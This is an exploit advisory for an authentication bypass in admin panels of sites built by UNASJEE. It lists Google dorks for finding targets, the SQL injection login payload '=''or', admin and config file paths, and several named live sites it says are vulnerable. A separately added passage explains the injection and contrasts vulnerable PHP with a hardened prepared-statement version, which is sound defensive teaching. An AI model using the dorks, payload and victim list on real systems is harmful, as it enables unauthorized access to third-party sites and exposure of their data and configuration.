
Design and Developed By UNASJEE Authentication Bypass Vulnerability

Author: KingSkrupellos, Published: 11-10-2018
# Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : unasjee.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090208
# Cyberizm : cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html

#################################################################################################

# Google Dork :

intext:''Designed & Developed by: UNASJEE''

intext:''Developed by: UNASJEE''

# Admin Control Panel Path : /admincp/index.php

# Exploit :

Admin Username : '=''or'

Admin Password : '=''or'
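
The bypass above is a classic SQL injection in the login query. The following PHP is an added example, not the vendor's code: it shows the kind of string-concatenated query the payload `'=''or'` defeats, next to the prepared-statement version that closes it. The table and column names (`admins`, `username`, `password`, `password_hash`) and the `$db` connection are assumptions; the page does not disclose the real schema.

```php
<?php
// Added example (not the vendor's code). Schema names and $db are assumed.

// VULNERABLE: user input is concatenated straight into the SQL string.
// With the advisory's payload  '=''or'  in both fields the WHERE clause becomes
//   WHERE username=''=''or'' AND password=''=''or''
// MySQL reads  username=''=''  as  (username='')=''  i.e.  0=''  which, under
// its loose string-to-number comparison, is  0=0  and therefore true. The
// clause matches the first admin row without any valid credentials.
function login_vulnerable(mysqli $db, string $user, string $pass): ?array {
    $sql = "SELECT id, username FROM admins WHERE username='" . $user .
           "' AND password='" . $pass . "'";
    $result = $db->query($sql);
    if ($result === false) {
        return null;
    }
    return $result->fetch_assoc() ?: null;
}

// HARDENED: a prepared statement binds the input as a value, so the payload is
// compared as a literal string and never parsed as SQL. The password is stored
// as password_hash() output and checked with password_verify(), so the query
// no longer contains the password at all.
function login_hardened(mysqli $db, string $user, string $pass): ?array {
    $stmt = $db->prepare(
        "SELECT id, username, password_hash FROM admins WHERE username = ? LIMIT 1"
    );
    $stmt->bind_param('s', $user);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null || !password_verify($pass, $row['password_hash'])) {
        return null; // unknown user and wrong password look identical to the caller
    }
    unset($row['password_hash']);
    return $row;
}
```

In the hardened version the same `'=''or'` input simply fails to match any `username`, which is also the value a defender should expect to see logged on a blocked attempt.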

# Configuration File Directory Path : /admincp/config.inc

# Usable Admin Control Panel URL Links =>

/admincp/mmainsections.php
/admincp/edititem.php
/admincp/allproducts2.php?sort=isNew
/admincp/allproducts2.php?sort=isSug
/admincp/allproducts.php?sort=order%20by%20ItmName
/admincp/allproducts.php?sort=order%20by%20ArtNo
/admincp/allproducts2.php?sort=soption
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editemail2.php
/admincp/newsletters.php
/admincp/links.php
/admincp/sendnewsletters.php
/admincp/changepass.php
/admincp/profile.php
/admincp/contact2.php
/admincp/f-view.php
/admincp/ani.php

# Directory File Paths =>

/admincp/sdata/itmimgs/....
/admincp/sdata/banner/....
/admincp/sdata/fviewimgs/...
/admincp/sdata/itmimgs/...
/admincp/sdata/mainimgs/...
/admincp/sdata/mimgs/...
/admincp/sdata/msecimgs/...
/admincp/sdata/nextimgs/...
/admincp/sdata/secbanner/...
/admincp/sdata/secimgs/..
/admincp/sdata/subimgs/...

#################################################################################################

# Example Vulnerable Sites =>

tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD

chableather.com/admincp/index.php

fadensports.com/admincp/config.inc

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
